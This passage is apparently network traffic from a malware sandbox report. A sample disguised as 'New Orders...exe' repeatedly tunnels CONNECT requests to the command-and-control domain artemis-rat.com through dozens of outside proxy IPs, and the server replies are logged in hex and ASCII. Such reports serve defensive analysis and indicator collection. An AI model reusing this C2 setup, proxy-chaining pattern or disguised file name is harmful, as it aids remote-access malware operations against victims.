                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.039165974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.242475033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        339192.168.2.950907122.116.150.290007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.556690931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        340192.168.2.950878202.162.219.1010807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.556742907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        341192.168.2.950958194.4.50.91123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.556812048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        342192.168.2.95021568.1.210.16341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.556869984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        343192.168.2.95022824.249.199.441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.556914091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        344192.168.2.95018120.204.214.7931297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.557835102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.957956076 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        345192.168.2.951002104.16.104.12807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.557996988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.712320089 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        346192.168.2.950873103.255.145.62847672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.558217049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.407636881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.664683104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.106616974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.944019079 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        347192.168.2.95023298.162.25.29316797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.559061050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        348192.168.2.951012172.67.182.96807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.559613943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.714026928 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        349192.168.2.950898212.108.145.19590907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.559696913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        350192.168.2.95097467.43.236.20200017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.559750080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.224435091 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        351192.168.2.9502914.236.183.3780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.560185909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.142035007 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.22.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        352192.168.2.950939174.75.211.22241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.560256958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        353192.168.2.950915106.14.255.124807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.561249971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        354192.168.2.95102345.12.30.231807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.561594963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.716052055 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        355192.168.2.95092395.66.138.2188807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.561939955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        356192.168.2.950969184.178.172.1441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.562100887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        357192.168.2.9509575.252.23.22010817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.562160015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        358192.168.2.951041162.159.246.135807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.562206984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.724571943 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        359192.168.2.951046185.162.229.70807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.562318087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.716334105 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        360192.168.2.95095339.108.227.108807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.562397003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.229981899 CET39INHTTP/1.1 200 Connection established
                                                                                        Mar 11, 2024 16:16:42.282305002 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 59 bf ec dc 4a 8d 7e 0e 03 67 e4 5e 33 f7 c7 96 3f b0 58 94 1c b1 59 56 03 77 07 92 ff 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: lhe YJ~g^3?XYVw*,+0/$#('=<5/artemis-rat.com#Kqkh2=eCl&^!gP^'XwA)eN0Yr2iuc


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        361192.168.2.95094747.93.121.200807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.562493086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.906032085 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        362192.168.2.95083639.165.0.13790027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.562551975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.177413940 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
